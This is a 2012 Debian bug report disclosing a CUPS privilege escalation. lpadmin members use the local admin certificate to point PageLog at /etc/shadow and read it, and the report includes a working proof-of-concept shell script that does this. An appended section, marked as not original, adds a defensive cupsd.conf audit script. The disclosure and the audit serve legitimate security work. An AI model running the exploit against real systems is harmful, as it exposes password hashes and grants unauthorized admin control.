[Secure-testing-team] Bug#692791: members of lpadmin can read every file on server via cups
Jörg Ludwig
joerg.ludwig at iserv.eu
Thu Nov 8 22:23:41 UTC 2012
Package: cups
Version: 1.4.4-7+squeeze1
Severity: critical
Tags: security
Justification: root security hole
Members of lpadmin can read /var/run/cups/certs/0. With this key it is possible to access the cups web interface as admin. You can edit the cups config file and set the page log to any filename you want (for example /etc/shadow). Then you can read the file contents by viewing the cups page log. By printing you can also write some random data to the given file.
As it is not possible to use the cups authentication with a normal web browser, I created a simple shell script to show the effect. When called as any unprivileged user who is a member of lpadmin, it should display the contents of /etc/shadow:
#!/bin/sh
set -e
# backup cupsd.conf
cp /etc/cups/cupsd.conf /tmp
AUTH="Authorization: Local $(cat /var/run/cups/certs/0)"
POST -d -H "$AUTH" -H "Cookie: org.cups.sid=" http://localhost:631/admin/ <<EOF
OP=config-server&org.cups.sid=&SAVECHANGES=1&CUPSDCONF=Listen localhost:631%0APageLog /etc/shadow
EOF
EOF
GET http://localhost:631/admin/log/page_log
This bug was detected by one of our customers, Jann Horn.
-- System Information:
Debian Release: 6.0.6
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (x86_64)
Kernel: Linux 2.6.32-5-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages cups depends on:
ii adduser 3.112+nmu2 add and remove users and groups
ii bc 1.06.95-2 The GNU bc arbitrary precision cal
ii cups-client 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii cups-common 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii cups-ppdc 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii debconf [debconf-2. 1.5.36.1 Debian configuration management sy
ii ghostscript 8.71~dfsg2-9 The GPL Ghostscript PostScript/PDF
ii libavahi-client3 0.6.27-2+squeeze1 Avahi client library
ii libavahi-common3 0.6.27-2+squeeze1 Avahi common library
ii libc6 2.11.3-4 Embedded GNU C Library: Shared lib
ii libcups2 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupscgi1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsdriver1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsimage2 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsmime1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsppdc1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libdbus-1-3 1.2.24-4+squeeze1 simple interprocess messaging syst
ii libgcc1 1:4.4.5-8 GCC support library
ii libgnutls26 2.8.6-1+squeeze2 the GNU TLS library - runtime libr
ii libgssapi-krb5-2 1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries - k
ii libijs-0.35 0.35-7 IJS raster image transport protoco
ii libkrb5-3 1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries
ii libldap-2.4-2 2.4.23-7.2 OpenLDAP libraries
ii libpam0g 1.1.1-6.1+squeeze1 Pluggable Authentication Modules l
ii libpaper1 1.1.24 library for handling paper charact
ii libpoppler5 0.12.4-1.2 PDF rendering library
ii libslp1 1.2.1-7.8 OpenSLP libraries
ii libstdc++6 4.4.5-8 The GNU Standard C++ Library v3
ii libusb-0.1-4 2:0.1.12-16 userspace USB programming library
ii lsb-base 3.2-23.2squeeze1 Linux Standard Base 3.2 init scrip
ii poppler-utils 0.12.4-1.2 PDF utilitites (based on libpopple
ii procps 1:3.2.8-9squeeze1 /proc file system utilities
ii ssl-cert 1.0.28 simple debconf wrapper for OpenSSL
ii ttf-freefont 20090104-7 Freefont Serif, Sans and Mono True
ii zlib1g 1:1.2.3.4.dfsg-3 compression library - runtime
Versions of packages cups recommends:
ii cups-driver-gutenprint 5.2.6-1 printer drivers for CUPS
ii foomatic-filters 4.0.5-6+squeeze2 OpenPrinting printer support - fil
ii ghostscript-cups 8.71~dfsg2-9 The GPL Ghostscript PostScript/PDF
Versions of packages cups suggests:
ii cups-bsd 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
pn cups-pdf <none> (no description available)
ii foomatic-db 20100630-1 OpenPrinting printer support - dat
pn hplip <none> (no description available)
ii smbclient 2:3.6.6-2~bpo60+1 command-line SMB/CIFS clients for
ii udev 164-3 /dev/ and hotplug management daemo
pn xpdf-korean | xpdf-jap <none> (no description available)
-- Configuration Files:
/etc/cups/cupsd.conf changed [not included]
-- debconf information excluded
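
Added example, not part of the original report and not CUPS code: a defender-side check that flags cupsd.conf log directives pointing outside the log directory, which is the state the report above leaves behind (PageLog set to /etc/shadow). It generalizes from PageLog to AccessLog and ErrorLog; the function name audit_cupsd_logs, the default allowed directory /var/log/cups and the sample configuration are assumptions made for this example.

```shell
#!/bin/sh
# Flag PageLog/AccessLog/ErrorLog targets outside an allowed log directory.
# Usage: audit_cupsd_logs CONF [ALLOWED_DIR]
# Prints one line per finding; exit status is 1 if anything was flagged.
audit_cupsd_logs() {
    conf=$1
    allowed=${2:-/var/log/cups}   # assumption: the expected log directory
    awk -v allowed="$allowed" '
        /^[ \t]*#/ { next }                 # skip comment lines
        {
            name = tolower($1)              # match directive names case-insensitively
            if (name != "pagelog" && name != "accesslog" && name != "errorlog")
                next
            path = $2
            # An empty value or the special name "syslog" is not a file path.
            if (path == "" || path == "syslog")
                next
            # Flag anything not under the allowed directory, and any ".."
            # component that could climb back out of it.
            if (index(path, allowed "/") != 1 || path ~ /(^|\/)\.\.(\/|$)/) {
                printf "%s:%d: %s -> %s\n", FILENAME, NR, $1, path
                bad++
            }
        }
        END { exit (bad > 0) }
    ' "$conf"
}

# Constructed sample configuration (not taken from a real host).
sample=$(mktemp)
cat > "$sample" <<'EOF'
# constructed cupsd.conf fragment
Listen localhost:631
ErrorLog /var/log/cups/error_log
AccessLog syslog
PageLog /etc/shadow
EOF
audit_cupsd_logs "$sample" || echo "unexpected log target(s) listed above"
rm -f "$sample"
```

On a real host, run it against /etc/cups/cupsd.conf and compare the result with a known-good copy of the file.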